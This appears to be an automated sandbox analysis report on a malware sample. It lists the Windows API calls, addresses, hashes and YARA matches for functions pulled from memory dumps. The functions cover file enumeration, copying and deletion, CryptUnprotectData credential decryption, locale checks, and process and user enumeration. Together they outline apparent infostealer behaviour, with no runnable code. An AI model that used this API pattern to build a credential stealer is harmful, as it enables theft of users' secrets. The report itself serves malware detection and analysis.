                                                                                                                                                                                                                              • Associated: 00000001.00000002.2117799562.000000006C092000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6c000000_u42w.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CriticalSection$PerformanceQuery$CounterEnterLeave__aulldiv_strnicmpstrcmp$AdjustmentCountFrequencyInitializeSpinSystemTimegetenv
                                                                                                                                                                                                                              • String ID: AuthcAMDenti$GTC$GenuntelineI$MOZ_TIMESTAMP_MODE$QPC
                                                                                                                                                                                                                              • API String ID: 301339242-3790311718
                                                                                                                                                                                                                              • Opcode ID: 7dce9f5321cf9ec8d30961e7da4ac4de8e5f359ec80e1d3152750494670bc315
                                                                                                                                                                                                                              • Instruction ID: 65f9371c19e3ca3b23744a9c7bdcf64c28e7d5f89017794c4c843eb0578122e5
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7dce9f5321cf9ec8d30961e7da4ac4de8e5f359ec80e1d3152750494670bc315
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 81B18075B0A3109FDF099F28C844B1A7BF9BB8A714F05CA2DE599D3754DB3099008B91
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • wsprintfA.USER32 ref: 00412589
                                                                                                                                                                                                                              • FindFirstFileA.KERNEL32(?,?), ref: 004125A0
                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,0041D864), ref: 004125CE
                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,0041D868), ref: 004125E4
                                                                                                                                                                                                                              • FindNextFileA.KERNEL32(000000FF,?), ref: 004127B9
                                                                                                                                                                                                                              • FindClose.KERNEL32(000000FF), ref: 004127CE
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u42w.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Find$File$CloseFirstNextwsprintf
                                                                                                                                                                                                                              • String ID: %s\%s$%s\%s$%s\*
                                                                                                                                                                                                                              • API String ID: 180737720-445461498
                                                                                                                                                                                                                              • Opcode ID: 8f761be7d470574fd0c0773a58bc316c93fdf6f04ed7eed09464723862d918f4
                                                                                                                                                                                                                              • Instruction ID: 16fd5a9597efbfb91ed0225017393bb16e0f77851f83799e5682f8bc7922baf0
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8f761be7d470574fd0c0773a58bc316c93fdf6f04ed7eed09464723862d918f4
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 676156B2900618ABCB24EBE0DD99EEA737DBF58701F00458DB61A96140EF74DB85CF94
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • wsprintfA.USER32 ref: 00411B9D
                                                                                                                                                                                                                              • FindFirstFileA.KERNEL32(?,?), ref: 00411BB4
                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,0041D834), ref: 00411BE2
                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,0041D838), ref: 00411BF8
                                                                                                                                                                                                                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00411D3D
                                                                                                                                                                                                                              • FindClose.KERNEL32(000000FF), ref: 00411D52
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u42w.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Find$File$CloseFirstNextwsprintf
                                                                                                                                                                                                                              • String ID: %s\%s
                                                                                                                                                                                                                              • API String ID: 180737720-4073750446
                                                                                                                                                                                                                              • Opcode ID: b051a28eb5b57fd918673d3b7973f10efc770a52c37ccf7a28974397e27099ed
                                                                                                                                                                                                                              • Instruction ID: 1beca0db89a34a7d9f561fb59a57ff38f1a0216f2a844ef05cbde65d1a44dc5a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b051a28eb5b57fd918673d3b7973f10efc770a52c37ccf7a28974397e27099ed
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D75168B5900618ABCB24EBB0DC85EEA737DBB48304F40458DB65A96050EB79ABC5CF94
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004215C4,?,00401E03,?,004215C8,?,?,00000000,?,00000000), ref: 00401813
                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,004215CC), ref: 00401863
                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,004215D0), ref: 00401879
                                                                                                                                                                                                                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00401C30
                                                                                                                                                                                                                              • DeleteFileA.KERNEL32(00000000), ref: 00401CB4
                                                                                                                                                                                                                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00401D0A
                                                                                                                                                                                                                              • FindClose.KERNEL32(000000FF), ref: 00401D1C
                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u42w.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                                                                                                                                                                                                              • String ID: \*.*
                                                                                                                                                                                                                              • API String ID: 1415058207-1173974218
                                                                                                                                                                                                                              • Opcode ID: 7dccfc80a2e994d6880ced94352564a69fe03a1e049cb0eca44c40d3a4ee9ec6
                                                                                                                                                                                                                              • Instruction ID: 3aa4ae790513c502dab12fd0122e5550b13815c0fff8c800b600eb4522263f51
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7dccfc80a2e994d6880ced94352564a69fe03a1e049cb0eca44c40d3a4ee9ec6
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D41225759102189BCB15FB61DC56EEE7739AF54308F41419EB10A62091EF38AFC9CFA8
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0041DC10,0041D73F), ref: 0040D22B
                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,0041DC14), ref: 0040D273
                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,0041DC18), ref: 0040D289
                                                                                                                                                                                                                              • FindNextFileA.KERNELBASE(000000FF,?), ref: 0040D4EE
                                                                                                                                                                                                                              • FindClose.KERNEL32(000000FF), ref: 0040D500
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u42w.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3334442632-0
                                                                                                                                                                                                                              • Opcode ID: 8282f631dc2bdf300fb3b4cde90d6c7fb3693e4d48daa387d09ae2e5fef72e18
                                                                                                                                                                                                                              • Instruction ID: a7e743a2a4f5118c59e4eb5b7e6cabc454f6fbff0e67e47d23a58287cf68124a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8282f631dc2bdf300fb3b4cde90d6c7fb3693e4d48daa387d09ae2e5fef72e18
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 63913B72A0020497CB14FFB1EC569EE777DAB84308F41466EF90A96581EE38D788CBD5
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                              • GetKeyboardLayoutList.USER32(00000000,00000000,0041D146), ref: 0041459E
                                                                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,?), ref: 004145B6
                                                                                                                                                                                                                              • GetKeyboardLayoutList.USER32(?,00000000), ref: 004145CA
                                                                                                                                                                                                                              • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 0041461F
                                                                                                                                                                                                                              • LocalFree.KERNEL32(00000000), ref: 004146DF
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u42w.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                                                                                                                                                                                                              • String ID: /
                                                                                                                                                                                                                              • API String ID: 3090951853-4001269591
                                                                                                                                                                                                                              • Opcode ID: 78b71d88eb1366e8f597a8ad9814dc9f21ad35f1ea9f5ddc6f987e2f9daa1b0c
                                                                                                                                                                                                                              • Instruction ID: e4a09482d03fe0ac07b2aa12fe49ef9b635f824a972481fa3f662a7a2871ed61
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 78b71d88eb1366e8f597a8ad9814dc9f21ad35f1ea9f5ddc6f987e2f9daa1b0c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D5413B74940218ABCB24DF50DC89BEDB775BB54308F2042DAE10A66191DB786FC5CF54
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,0041D74E), ref: 0040DBD2
                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,0041DC58), ref: 0040DC22
                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,0041DC5C), ref: 0040DC38
                                                                                                                                                                                                                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0040E306
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u42w.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                                                                                                                                                                                                              • String ID: \*.*
                                                                                                                                                                                                                              • API String ID: 433455689-1173974218
                                                                                                                                                                                                                              • Opcode ID: f638ffc6577c20101606d182550c77964704a65fb23fd15609d935b91d1c41c1
                                                                                                                                                                                                                              • Instruction ID: 8f23b39e961a58df861ec407c7814dc8b58ae9c3eb94c511c30fb23e96a564a4
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f638ffc6577c20101606d182550c77964704a65fb23fd15609d935b91d1c41c1
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 88126771A002145ACB14FB61DC56EED7739AF54308F4142AEB50A66091EF389FC8CFE8
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • CryptBinaryToStringA.CRYPT32(00000000,>N@,40000001,00000000,00000000), ref: 004155C0
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u42w.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: BinaryCryptString
                                                                                                                                                                                                                              • String ID: >N@
                                                                                                                                                                                                                              • API String ID: 80407269-3381801619
                                                                                                                                                                                                                              • Opcode ID: 718bb6be1b75e617e987197471ae693474da6023ddc0167bf927d0320b7ad6f5
                                                                                                                                                                                                                              • Instruction ID: 37622f5e64546725dbf22d4b9568f407ee9b467eb6af981ec2fff7c5b56759cd
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 718bb6be1b75e617e987197471ae693474da6023ddc0167bf927d0320b7ad6f5
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 73110D74200A04FFDB10CFA4E844FEB37AABF89310F509549F9098B254D775E881DBA4
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00415D1E
                                                                                                                                                                                                                              • Process32First.KERNEL32(0041D599,00000128), ref: 00415D32
                                                                                                                                                                                                                              • Process32Next.KERNEL32(0041D599,00000128), ref: 00415D47
                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,00000000), ref: 00415D5C
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(0041D599), ref: 00415D7A
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u42w.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 420147892-0
                                                                                                                                                                                                                              • Opcode ID: f6d0f21b7cc225942ebaf2b71921687e4bacd107d031d79921886f9976f157bb
                                                                                                                                                                                                                              • Instruction ID: 4a4bbd9776da2ad99231b6c5471aa9e11f786ff18f9e7f574f496e4dc08d41d8
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f6d0f21b7cc225942ebaf2b71921687e4bacd107d031d79921886f9976f157bb
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 53012575A00608EBDB24DF94DD58BDEB7B9BF88304F108189E90597250DB749B81CF50
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?,02F650C8,00000000,?,0041D758,00000000,?,00000000,00000000,?,02F65B90,00000000), ref: 004144C0
                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 004144C7
                                                                                                                                                                                                                              • GetTimeZoneInformation.KERNEL32(?), ref: 004144DA
                                                                                                                                                                                                                              • wsprintfA.USER32 ref: 00414514
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u42w.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Heap$AllocInformationProcessTimeZonewsprintf
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 362916592-0
                                                                                                                                                                                                                              • Opcode ID: 3e8ee039c0baa52381bc867147264b9e0472758f99ecf5fc77eb662dd471fe6c
                                                                                                                                                                                                                              • Instruction ID: 63b956e3650aea0bdd01ac085b80a838c67200ff8d98e36f2a49cf33a9f6a1bd
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3e8ee039c0baa52381bc867147264b9e0472758f99ecf5fc77eb662dd471fe6c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C7F06770E047289BDB309B64DD49FA9737ABB44311F0002D5EA0AE3291DB749E858F97
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00409564
                                                                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,00000000), ref: 00409583
                                                                                                                                                                                                                              • LocalFree.KERNEL32(?), ref: 004095AF
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u42w.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Local$AllocCryptDataFreeUnprotect
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2068576380-0
                                                                                                                                                                                                                              • Opcode ID: 22788d86bb0e3b36a7a96175dcc17964957ca332b329b0ec9e9903d4a9c63904
                                                                                                                                                                                                                              • Instruction ID: 845aa5354f8c35be15d3c308e338542aeef751caf2e905b87ee6994bb5fcaacd
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 22788d86bb0e3b36a7a96175dcc17964957ca332b329b0ec9e9903d4a9c63904
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2B11B7B8A00609EFCB04DF94C984AAEB7B5FF88301F104559E915A7390D774AE51CBA1
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000104,00401177,02F61980,004136EB,0041D6E3), ref: 004143CD
                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 004143D4
                                                                                                                                                                                                                              • GetUserNameA.ADVAPI32(?,00000104), ref: 004143EC
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u42w.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Heap$AllocNameProcessUser
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1206570057-0
                                                                                                                                                                                                                              • Opcode ID: 19f43c5935948d257337b5cfe167422182bb8e9e8b16b88c7073f3e19bcb2857
                                                                                                                                                                                                                              • Instruction ID: fd22aaf49eebc4deedfa71bce2fb200d05227bfc9b63873cd8cb515d50d954e6
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 19f43c5935948d257337b5cfe167422182bb8e9e8b16b88c7073f3e19bcb2857
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2CE08CB490070CFFCB20EFE4DC49E9CBBB8AB08312F000184FA09E3280DB7056848B91
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,004136D7,0041D6E3), ref: 0040112A
                                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 0040113E
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
